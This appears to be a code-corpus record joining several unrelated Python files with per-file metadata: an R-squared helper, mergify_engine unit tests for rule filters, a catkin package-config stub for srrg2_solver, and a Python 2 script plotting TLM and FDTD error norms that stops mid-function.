|
8b517d599d44fb726b6ca3229b8c931fb2773301
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
def rsq(true, predictions):
return 1 - np.mean((true - predictions)**2) / np.var(true)
| 16.142857
| 62
| 0.654867
| 18
| 113
| 4.111111
| 0.722222
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021978
| 0.19469
| 113
| 6
| 63
| 18.833333
| 0.791209
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
02d43a8574732796093d9761a514807d226b3c54
| 16,653
|
py
|
Python
|
mergify_engine/tests/unit/rules/test_filter.py
|
oharboe/mergify-engine
|
70785b1b1d9b2360f7a41c6d7f560e39d9ec4905
|
[
"Apache-2.0"
] | null | null | null |
mergify_engine/tests/unit/rules/test_filter.py
|
oharboe/mergify-engine
|
70785b1b1d9b2360f7a41c6d7f560e39d9ec4905
|
[
"Apache-2.0"
] | null | null | null |
mergify_engine/tests/unit/rules/test_filter.py
|
oharboe/mergify-engine
|
70785b1b1d9b2360f7a41c6d7f560e39d9ec4905
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Copyright © 2018 Julien Danjou <jd@mergify.io>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
from freezegun import freeze_time
import pytest
from mergify_engine.rules import filter
from mergify_engine.rules import parser
pytestmark = pytest.mark.asyncio
class FakePR(dict): # type: ignore[type-arg]
def __getattr__(self, k):
return self[k]
async def test_binary() -> None:
f = filter.BinaryFilter({"=": ("foo", 1)})
assert await f(FakePR({"foo": 1}))
assert not await f(FakePR({"foo": 2}))
async def test_string() -> None:
f = filter.BinaryFilter({"=": ("foo", "bar")})
assert await f(FakePR({"foo": "bar"}))
assert not await f(FakePR({"foo": 2}))
async def test_not() -> None:
f = filter.BinaryFilter({"-": {"=": ("foo", 1)}})
assert not await f(FakePR({"foo": 1}))
assert await f(FakePR({"foo": 2}))
async def test_len() -> None:
f = filter.BinaryFilter({"=": ("#foo", 3)})
assert await f(FakePR({"foo": "bar"}))
with pytest.raises(filter.InvalidOperator):
await f(FakePR({"foo": 2}))
assert not await f(FakePR({"foo": "a"}))
assert not await f(FakePR({"foo": "abcedf"}))
assert await f(FakePR({"foo": [10, 20, 30]}))
assert not await f(FakePR({"foo": [10, 20]}))
assert not await f(FakePR({"foo": [10, 20, 40, 50]}))
f = filter.BinaryFilter({">": ("#foo", 3)})
assert await f(FakePR({"foo": "barz"}))
with pytest.raises(filter.InvalidOperator):
await f(FakePR({"foo": 2}))
assert not await f(FakePR({"foo": "a"}))
assert await f(FakePR({"foo": "abcedf"}))
assert await f(FakePR({"foo": [10, "abc", 20, 30]}))
assert not await f(FakePR({"foo": [10, 20]}))
assert not await f(FakePR({"foo": []}))
async def test_regexp() -> None:
f = filter.BinaryFilter({"~=": ("foo", "^f")})
assert await f(FakePR({"foo": "foobar"}))
assert await f(FakePR({"foo": "foobaz"}))
assert not await f(FakePR({"foo": "x"}))
assert not await f(FakePR({"foo": None}))
f = filter.BinaryFilter({"~=": ("foo", "^$")})
assert await f(FakePR({"foo": ""}))
assert not await f(FakePR({"foo": "x"}))
async def test_regexp_invalid() -> None:
with pytest.raises(filter.InvalidArguments):
filter.BinaryFilter({"~=": ("foo", r"([^\s\w])(\s*\1+")})
async def test_set_value_expanders() -> None:
f = filter.BinaryFilter(
{"=": ("foo", "@bar")},
)
f.value_expanders["foo"] = lambda x: [x.replace("@", "foo")]
assert await f(FakePR({"foo": "foobar"}))
assert not await f(FakePR({"foo": "x"}))
async def test_set_value_expanders_unset_at_init() -> None:
f = filter.BinaryFilter({"=": ("foo", "@bar")})
f.value_expanders = {"foo": lambda x: [x.replace("@", "foo")]}
assert await f(FakePR({"foo": "foobar"}))
assert not await f(FakePR({"foo": "x"}))
async def test_does_not_contain() -> None:
f = filter.BinaryFilter({"!=": ("foo", 1)})
assert await f(FakePR({"foo": []}))
assert await f(FakePR({"foo": [2, 3]}))
assert not await f(FakePR({"foo": (1, 2)}))
async def test_set_value_expanders_does_not_contain() -> None:
f = filter.BinaryFilter({"!=": ("foo", "@bar")})
f.value_expanders["foo"] = lambda x: ["foobaz", "foobar"]
assert not await f(FakePR({"foo": "foobar"}))
assert not await f(FakePR({"foo": "foobaz"}))
assert await f(FakePR({"foo": "foobiz"}))
async def test_contains() -> None:
f = filter.BinaryFilter({"=": ("foo", 1)})
assert await f(FakePR({"foo": [1, 2]}))
assert not await f(FakePR({"foo": [2, 3]}))
assert await f(FakePR({"foo": (1, 2)}))
f = filter.BinaryFilter({">": ("foo", 2)})
assert not await f(FakePR({"foo": [1, 2]}))
assert await f(FakePR({"foo": [2, 3]}))
async def test_unknown_attribute() -> None:
f = filter.BinaryFilter({"=": ("foo", 1)})
with pytest.raises(filter.UnknownAttribute):
await f(FakePR({"bar": 1}))
async def test_parse_error() -> None:
with pytest.raises(filter.ParseError):
filter.BinaryFilter({})
async def test_unknown_operator() -> None:
with pytest.raises(filter.UnknownOperator):
filter.BinaryFilter({"oops": (1, 2)}) # type: ignore[arg-type]
async def test_invalid_arguments() -> None:
with pytest.raises(filter.InvalidArguments):
filter.BinaryFilter({"=": (1, 2, 3)}) # type: ignore[typeddict-item]
async def test_str() -> None:
assert "foo~=^f" == str(filter.BinaryFilter({"~=": ("foo", "^f")}))
assert "-foo=1" == str(filter.BinaryFilter({"-": {"=": ("foo", 1)}}))
assert "foo" == str(filter.BinaryFilter({"=": ("foo", True)}))
assert "-bar" == str(filter.BinaryFilter({"=": ("bar", False)}))
with pytest.raises(filter.InvalidOperator):
str(filter.BinaryFilter({">=": ("bar", False)}))
def time(hour: int, minute: int) -> datetime.time:
return datetime.time(hour=hour, minute=minute, tzinfo=datetime.timezone.utc)
def dtime(hour: int, minute: int) -> datetime.datetime:
return datetime.datetime.utcnow().replace(
hour=hour, minute=minute, tzinfo=datetime.timezone.utc
)
@freeze_time("2012-01-14")
async def test_datetime_binary() -> None:
assert "foo>=2012-01-14T00:00:00" == str(
filter.BinaryFilter({">=": ("foo", dtime(0, 0))})
)
assert "foo<=2012-01-14T23:59:00" == str(
filter.BinaryFilter({"<=": ("foo", dtime(23, 59))})
)
assert "foo<=2012-01-14T03:09:00" == str(
filter.BinaryFilter({"<=": ("foo", dtime(3, 9))})
)
f = filter.BinaryFilter({"<=": ("foo", dtime(5, 8))})
assert await f(FakePR({"foo": dtime(5, 8)}))
assert await f(FakePR({"foo": dtime(2, 1)}))
assert await f(FakePR({"foo": dtime(5, 1)}))
assert not await f(FakePR({"foo": dtime(6, 2)}))
assert not await f(FakePR({"foo": dtime(8, 9)}))
f = filter.BinaryFilter({">=": ("foo", dtime(5, 8))})
assert await f(FakePR({"foo": dtime(5, 8)}))
assert not await f(FakePR({"foo": dtime(2, 1)}))
assert not await f(FakePR({"foo": dtime(5, 1)}))
assert await f(FakePR({"foo": dtime(6, 2)}))
assert await f(FakePR({"foo": dtime(8, 9)}))
@freeze_time("2012-01-14")
async def test_time_binary() -> None:
assert "foo>=00:00" == str(filter.BinaryFilter({">=": ("foo", time(0, 0))}))
assert "foo<=23:59" == str(filter.BinaryFilter({"<=": ("foo", time(23, 59))}))
assert "foo<=03:09" == str(filter.BinaryFilter({"<=": ("foo", time(3, 9))}))
f = filter.BinaryFilter({"<=": ("foo", time(5, 8))})
assert await f(FakePR({"foo": time(5, 8)}))
assert await f(FakePR({"foo": time(2, 1)}))
assert await f(FakePR({"foo": time(5, 1)}))
assert not await f(FakePR({"foo": time(6, 2)}))
assert not await f(FakePR({"foo": time(8, 9)}))
f = filter.BinaryFilter({">=": ("foo", time(5, 8))})
assert await f(FakePR({"foo": time(5, 8)}))
assert not await f(FakePR({"foo": time(2, 1)}))
assert not await f(FakePR({"foo": time(5, 1)}))
assert await f(FakePR({"foo": time(6, 2)}))
assert await f(FakePR({"foo": time(8, 9)}))
@freeze_time("2012-01-14T12:15:00")
async def test_time_near_datetime() -> None:
atmidnight = datetime.datetime(
2012, 1, 15, 0, 0, 0, 0, tzinfo=datetime.timezone.utc
)
nextday = datetime.datetime(2012, 1, 15, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
today = datetime.datetime(2012, 1, 14, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
soon = datetime.datetime(2012, 1, 14, 5, 9, 0, 0, tzinfo=datetime.timezone.utc)
f = filter.NearDatetimeFilter({"<=": ("foo", today.timetz())})
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(5, 1)})) == today
assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
f = filter.NearDatetimeFilter({"<": ("foo", today.timetz())})
assert await f(FakePR({"foo": time(5, 8)})) == atmidnight
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(5, 1)})) == today
assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
f = filter.NearDatetimeFilter({">=": ("foo", today.timetz())})
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(5, 1)})) == today
assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
f = filter.NearDatetimeFilter({">": ("foo", today.timetz())})
assert await f(FakePR({"foo": time(5, 8)})) == atmidnight
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(5, 1)})) == today
assert await f(FakePR({"foo": time(6, 2)})) == atmidnight
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
f = filter.NearDatetimeFilter({"=": ("foo", today.timetz())})
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(5, 1)})) == today
assert await f(FakePR({"foo": time(6, 2)})) == nextday
assert await f(FakePR({"foo": time(8, 9)})) == nextday
f = filter.NearDatetimeFilter({"!=": ("foo", today.timetz())})
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(5, 1)})) == today
assert await f(FakePR({"foo": time(6, 2)})) == nextday
assert await f(FakePR({"foo": time(8, 9)})) == nextday
@freeze_time("2012-01-14T12:15:00")
async def test_datetime_near_datetime() -> None:
today = datetime.datetime(2012, 1, 14, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
soon = datetime.datetime(2012, 1, 14, 5, 9, 0, 0, tzinfo=datetime.timezone.utc)
f = filter.NearDatetimeFilter({"<=": ("foo", today)})
assert await f(FakePR({"foo": dtime(5, 8)})) == soon
assert await f(FakePR({"foo": dtime(2, 1)})) == today
assert await f(FakePR({"foo": dtime(5, 1)})) == today
assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
f = filter.NearDatetimeFilter({"<": ("foo", today)})
assert await f(FakePR({"foo": dtime(5, 8)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(2, 1)})) == today
assert await f(FakePR({"foo": dtime(5, 1)})) == today
assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
f = filter.NearDatetimeFilter({">=": ("foo", today)})
assert await f(FakePR({"foo": dtime(5, 8)})) == soon
assert await f(FakePR({"foo": dtime(2, 1)})) == today
assert await f(FakePR({"foo": dtime(5, 1)})) == today
assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
f = filter.NearDatetimeFilter({">": ("foo", today)})
assert await f(FakePR({"foo": dtime(5, 8)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(2, 1)})) == today
assert await f(FakePR({"foo": dtime(5, 1)})) == today
assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
f = filter.NearDatetimeFilter({"=": ("foo", today)})
assert await f(FakePR({"foo": dtime(5, 8)})) == soon
assert await f(FakePR({"foo": dtime(2, 1)})) == today
assert await f(FakePR({"foo": dtime(5, 1)})) == today
assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
f = filter.NearDatetimeFilter({"!=": ("foo", today)})
assert await f(FakePR({"foo": dtime(5, 8)})) == soon
assert await f(FakePR({"foo": dtime(2, 1)})) == today
assert await f(FakePR({"foo": dtime(5, 1)})) == today
assert await f(FakePR({"foo": dtime(6, 2)})) == filter.DT_MAX
assert await f(FakePR({"foo": dtime(8, 9)})) == filter.DT_MAX
@freeze_time("2012-01-14T12:05:00")
async def test_multiple_near_datetime() -> None:
atmidnight = datetime.datetime(
2012, 1, 15, 0, 0, 0, 0, tzinfo=datetime.timezone.utc
)
today = datetime.datetime(2012, 1, 14, 5, 8, 0, 0, tzinfo=datetime.timezone.utc)
in_two_hours = datetime.datetime(
2012, 1, 14, 7, 5, 0, 0, tzinfo=datetime.timezone.utc
)
soon = datetime.datetime(2012, 1, 14, 5, 9, 0, 0, tzinfo=datetime.timezone.utc)
f = filter.NearDatetimeFilter(
{
"or": [
{"<=": ("foo", in_two_hours.timetz())},
{"<=": ("foo", today.timetz())},
]
}
)
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
f = filter.NearDatetimeFilter(
{
"and": [
{">=": ("foo", in_two_hours.timetz())},
{">=": ("foo", today.timetz())},
]
}
)
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
f = filter.NearDatetimeFilter(
{
"or": [
{">=": ("foo", in_two_hours.timetz())},
{">=": ("foo", today.timetz())},
]
}
)
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
f = filter.NearDatetimeFilter(
{
"and": [
{"<=": ("foo", in_two_hours.timetz())},
{"<=": ("foo", today.timetz())},
]
}
)
assert await f(FakePR({"foo": time(5, 8)})) == soon
assert await f(FakePR({"foo": time(2, 1)})) == today
assert await f(FakePR({"foo": time(6, 8)})) == in_two_hours
assert await f(FakePR({"foo": time(8, 9)})) == atmidnight
assert await f(FakePR({"foo": time(18, 9)})) == atmidnight
async def test_or() -> None:
f = filter.BinaryFilter({"or": ({"=": ("foo", 1)}, {"=": ("bar", 1)})})
assert await f(FakePR({"foo": 1, "bar": 1}))
assert not await f(FakePR({"bar": 2, "foo": 2}))
assert await f(FakePR({"bar": 2, "foo": 1}))
assert await f(FakePR({"bar": 1, "foo": 2}))
async def test_and() -> None:
f = filter.BinaryFilter({"and": ({"=": ("foo", 1)}, {"=": ("bar", 1)})})
assert await f(FakePR({"bar": 1, "foo": 1}))
assert not await f(FakePR({"bar": 2, "foo": 2}))
assert not await f(FakePR({"bar": 2, "foo": 1}))
assert not await f(FakePR({"bar": 1, "foo": 2}))
with pytest.raises(filter.ParseError):
filter.BinaryFilter({"or": {"foo": "whar"}})
async def test_chain() -> None:
f1 = {"=": ("bar", 1)}
f2 = {"=": ("foo", 1)}
f = filter.BinaryFilter({"and": (f1, f2)})
assert await f(FakePR({"bar": 1, "foo": 1}))
assert not await f(FakePR({"bar": 2, "foo": 2}))
assert not await f(FakePR({"bar": 2, "foo": 1}))
assert not await f(FakePR({"bar": 1, "foo": 2}))
async def test_parser_leaf() -> None:
for string in ("head=foobar", "-base=master", "#files>3"):
tree = parser.search.parseString(string, parseAll=True)[0]
assert string == str(filter.BinaryFilter(tree))
async def test_parser_group() -> None:
string = str(
filter.BinaryFilter({"and": ({"=": ("head", "foobar")}, {">": ("#files", 3)})})
)
assert string == "(head=foobar and #files>3)"
| 39.183529
| 87
| 0.577974
| 2,310
| 16,653
| 4.122944
| 0.08961
| 0.097018
| 0.194036
| 0.223646
| 0.818249
| 0.76575
| 0.727215
| 0.694246
| 0.603528
| 0.603528
| 0
| 0.042071
| 0.196421
| 16,653
| 424
| 88
| 39.275943
| 0.669556
| 0.040113
| 0
| 0.466258
| 0
| 0
| 0.075473
| 0.00451
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.009202
| false
| 0
| 0.015337
| 0.009202
| 0.03681
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
02dafc8b81707ec619b103534acbbba814024db5
| 1,142
|
py
|
Python
|
catkin_ws/build/srrg2_solver/catkin_generated/pkg.develspace.context.pc.py
|
laaners/progetto-labiagi_pick_e_delivery
|
3453bfbc1dd7562c78ba06c0f79b069b0a952c0e
|
[
"MIT"
] | null | null | null |
catkin_ws/build/srrg2_solver/catkin_generated/pkg.develspace.context.pc.py
|
laaners/progetto-labiagi_pick_e_delivery
|
3453bfbc1dd7562c78ba06c0f79b069b0a952c0e
|
[
"MIT"
] | null | null | null |
catkin_ws/build/srrg2_solver/catkin_generated/pkg.develspace.context.pc.py
|
laaners/progetto-labiagi_pick_e_delivery
|
3453bfbc1dd7562c78ba06c0f79b069b0a952c0e
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/alessiohu/Desktop/progetto-labiagi/catkin_ws/src/srrg2_solver/srrg2_solver/src".split(';') if "/home/alessiohu/Desktop/progetto-labiagi/catkin_ws/src/srrg2_solver/srrg2_solver/src" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lsrrg2_solver_core_library;-lsrrg2_solver_types2d_library;-lsrrg2_solver_types3d_library;-lsrrg2_solver_calib_library;-lsrrg2_solver_projective_library;-lsrrg2_solver_factor_graph_utils_library;-lsrrg2_solver_linear_solvers_library;-lsrrg2_solver_sparse_block_matrix_library".split(';') if "-lsrrg2_solver_core_library;-lsrrg2_solver_types2d_library;-lsrrg2_solver_types3d_library;-lsrrg2_solver_calib_library;-lsrrg2_solver_projective_library;-lsrrg2_solver_factor_graph_utils_library;-lsrrg2_solver_linear_solvers_library;-lsrrg2_solver_sparse_block_matrix_library" != "" else []
PROJECT_NAME = "srrg2_solver"
PROJECT_SPACE_DIR = "/home/alessiohu/Desktop/progetto-labiagi/catkin_ws/devel/.private/srrg2_solver"
PROJECT_VERSION = "0.8.0"
| 126.888889
| 618
| 0.854641
| 155
| 1,142
| 5.76129
| 0.348387
| 0.215006
| 0.297872
| 0.094065
| 0.724524
| 0.724524
| 0.724524
| 0.676372
| 0.676372
| 0.676372
| 0
| 0.026292
| 0.034151
| 1,142
| 8
| 619
| 142.75
| 0.783318
| 0.047285
| 0
| 0
| 1
| 0
| 0.752302
| 0.732965
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
02eb3b4c76bfe332ceabb9ab2661fd00d3ded333
| 20,386
|
py
|
Python
|
data_plotting/plot_errors_norms_cfa2018.py
|
qgoestch/sinecity_testcases
|
ec04ba707ff69b5c1b4b42e56e522855a2f34a65
|
[
"BSD-3-Clause"
] | null | null | null |
data_plotting/plot_errors_norms_cfa2018.py
|
qgoestch/sinecity_testcases
|
ec04ba707ff69b5c1b4b42e56e522855a2f34a65
|
[
"BSD-3-Clause"
] | null | null | null |
data_plotting/plot_errors_norms_cfa2018.py
|
qgoestch/sinecity_testcases
|
ec04ba707ff69b5c1b4b42e56e522855a2f34a65
|
[
"BSD-3-Clause"
] | 1
|
2021-02-18T13:07:10.000Z
|
2021-02-18T13:07:10.000Z
|
# -*- coding: utf-8 -*-
##
# \file plot_errors_norms_cfa2018.py
# \title Errors and norms for each case: _cfa2018 only 2-norm and max-norm
# \author Pierre Chobeau
# \version 0.1
# \license BSD 3-Clause License
# \inst UMRAE (Ifsttar Nantes), LAUM (Le Mans Université)
# \date 2018, 15 Mar.
##
import numpy as np
import matplotlib.ticker
from matplotlib import pyplot as plt
import os
base_path = reduce (lambda l,r: l + os.path.sep + r,
os.path.dirname( os.path.realpath( __file__ ) ).split( os.path.sep ) )
def plot_error_basic_cfa2018(h_set, one_norm, two_norm, max_norm,
ord_acc_one, ord_acc_two, ord_acc_max,
case, save_fig):
"""
Main plot made of 3 subplots that show (1) the avaraged error,
(2) the two-norm of the error and (3) the max-norm of the error.
cfa2018: show two- and max-norms only.
:param h_set: spatial step sequence (m).
:type h_set: list of floats
:param avg_error: error averaged over all receivers for
each spatial step.
:type avg_error_tlm: 1d-array
:param two_norm: relative error in the 2-norm for
each spatial step.
:type two_norm: 1d-array
:param max_norm: relative error in the MAX-norm for
each spatial step.
:type max_norm: 1d-array
:param ord_acc: order of accuracy between two consecutive grids in
the 2-norm.
:param case: integer that sorts of the saved folders in the results dir.
:type case: int
:param save_fig: save or not the figure.
:type save_fig: bool
:type ord_acc: 1d-array
:return: two graphs: the errors and norms,and the order of accuracy.
"""
print 'Plotting the errors'
h_th = np.linspace(h_set[0] - 0.001, h_set[-1] + 0.001, 100)
j = 2
# =========================================================================
# All grids figure
# =========================================================================
fig = plt.figure('Errors', figsize=(9., 4.))
ax = fig.add_subplot(121)
ax.loglog(h_set, two_norm[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
error_margin = 0.02 * (h_set[j] / h_set[j]) ** 2 * one_norm[j]
scnd_ord_th = (h_set / h_set[j]) ** 2 * two_norm[j] + error_margin
ax.loglog(h_th, (h_th / h_set[j]) ** 2 * two_norm[j], 'k-', lw=1.5)
plt.legend(('FD', '2nd order'), fontsize=14)
# =========================================================================
# Linear regression on log log
# =========================================================================
coefs = np.polyfit(h_set, two_norm, 1)
poly = np.poly1d(coefs)
ys = poly(h_set)
m, c = np.polyfit(h_set, np.log10(two_norm), 1) # fit log(y) = m*log(x) + c
y_fit = np.power(10, m * h_set + c) # calculate the fitted values of y
# print m, c
# plt.plot(h_set, y_fit, 'y--', lw=3)
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel(r'$||error||_{2}$', fontsize=12)
plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.001)
plt.ylim(10 ** -7, 10 ** -1)
plt.tight_layout()
ax = fig.add_subplot(122)
ax.loglog(h_th, (h_th / h_set[j]) ** 2 * max_norm[j], 'k-', lw=1.5)
ax.loglog(h_set, max_norm[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.0e'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel(r'$||error||_{max}$', fontsize=12)
plt.xlim(h_set[0] - 0.001, h_set[-1] + 0.001)
plt.ylim(10 ** -7, 10 ** -1)
plt.tight_layout()
if save_fig:
print 'Saving figures'
res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
'results', 'case%i' % case, 'figures')
if not os.path.exists(res_path):
os.makedirs(res_path)
plt.savefig(os.path.join(res_path, 'errors_fd_cfa2018.eps'),
transparent=True, bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'errors_fd_cfa2018.png'),
transparent=True, bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'errors_fd_cfa2018.pdf'),
transparent=True, bbox_inches='tight', pad_inches=0)
# =========================================================================
# Order of accuracy btw. 2 consecutive points
# =========================================================================
fig = plt.figure('Order of accuracy', figsize=(9., 4.))
ax = fig.add_subplot(121)
ax.semilogx(h_set[:-1], ord_acc_two[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
# plt.legend(('TLM', 'FDTD'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel('Obs. order of accuracy', fontsize=12)
plt.ylim(0, 4)
ax = fig.add_subplot(122)
ax.semilogx(h_set[:-1], ord_acc_max[:], 'bd',
markersize=4, markeredgewidth=1.2, markeredgecolor='b',
markerfacecolor='None')
# plt.legend(('TLM', 'FDTD'))
ax.yaxis.set_major_formatter(matplotlib.ticker.FormatStrFormatter('%.1f'))
ax.grid(True, which="both", ls=":")
plt.xlabel('$h$ (m)', fontsize=12)
plt.ylabel('Obs. order of accuracy', fontsize=12)
plt.ylim(0, 4)
plt.tight_layout()
if save_fig:
res_path = os.path.join(base_path.rsplit(os.sep, 1)[0],
'results', 'case%i' % case, 'figures')
if not os.path.exists(res_path):
os.makedirs(res_path)
plt.savefig(os.path.join(res_path, 'ord_acc_fd_cfa2018.eps'),
transparent=True, bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'ord_acc_fd_cfa2018.png'),
transparent=True, bbox_inches='tight', pad_inches=0)
plt.savefig(os.path.join(res_path, 'ord_acc_fd_cfa2018.pdf'),
transparent=True, bbox_inches='tight', pad_inches=0)
plt.show()
def plot_errors_norms_cfa2018(h_set, avg_error_tlm, avg_error_fdtd,
two_norm_tlm, two_norm_fdtd,
max_norm_tlm, max_norm_fdtd,
ord_acc_tlm_one, ord_acc_fdtd_one,
ord_acc_tlm_two, ord_acc_fdtd_two,
ord_acc_tlm_max, ord_acc_fdtd_max, case):
"""
Main plot made of 3 subplots that show (1) the avaraged error,
(2) the two-norm of the error and (3) the max-norm of the error.
cfa2018: show two- and max-norms only.
:param h_set: spatial step sequence (m).
:type h_set: list of floats
:param avg_error_tlm: error averaged over all receivers for the TLM for
each spatial step.
:type avg_error_tlm: 1d-array
:param avg_error_fdtd: error averaged over all receivers for the FDTD for
each spatial step.
:type avg_error_fdtd: 1d-array
:param two_norm_tlm: relative error in the 2-norm for the TLM for
each spatial step.
:type two_norm_tlm: 1d-array
:param two_norm_fdtd: relative error in the 2-norm for the FDTD for
each spatial step.
:type two_norm_fdtd: 1d-array
:param max_norm_tlm: relative error in the MAX-norm for the TLM for
each spatial step.
:type max_norm_tlm: 1d-array
:param max_norm_fdtd: relative error in the MAX-norm for the FDTD for
each spatial step.
:type max_norm_fdtd: 1d-array
:param ord_acc_tlm_two: order of accuracy between two consecutive grids in
the 2-norm for the TLM.
:type ord_acc_tlm_two: 1d-array
:param ord_acc_fdtd_two: order of accuracy between two consecutive grids in
the 2-norm for the FDTD.
:type ord_acc_fdtd_two: 1d-array
:param ord_acc_tlm_max: order of accuracy between two consecutive grids in
the max-norm for the TLM.
:type ord_acc_tlm_max: 1d-array
:param ord_acc_fdtd_max: order of accuracy between two consecutive grids in
the max-norm for the FDTD.
:type ord_acc_fdtd_max: 1d-array
:param case: integer that sorts of the saved folders in the results
directory.
:type case: int
:return: two graphs, first the errors and norms, second the order of
accuracy for each norm.
"""
print 'Plotting the errors'
h_th = np.linspace(h_set[0] - 0.001, h_set[-1] + 0.001, 100)
j = 1
fig = plt.figure('Errors', figsize=(9., 4.))
ax = fig.add_subplot(121)
ax.loglog(h_set, two_norm_tlm[:], 'rs',
markersize=7, markeredgewidth=1.8, markeredgecolor='r',
markerfacecolor='None')
ax.loglog(h_set, two_norm_fdtd[:], 'go',
markersize=4, markeredgewidth=1.8, markeredgecolor='g',
markerfacecolor='None')
ax.loglog(h_th, (h_th / h_set[j]) ** 1 * two_norm_tlm[j], 'm--', lw=1)
ax.loglog(h_th, (h_th / h_set[j]) ** 2 * two_norm_tlm[j], 'b-', lw=1)
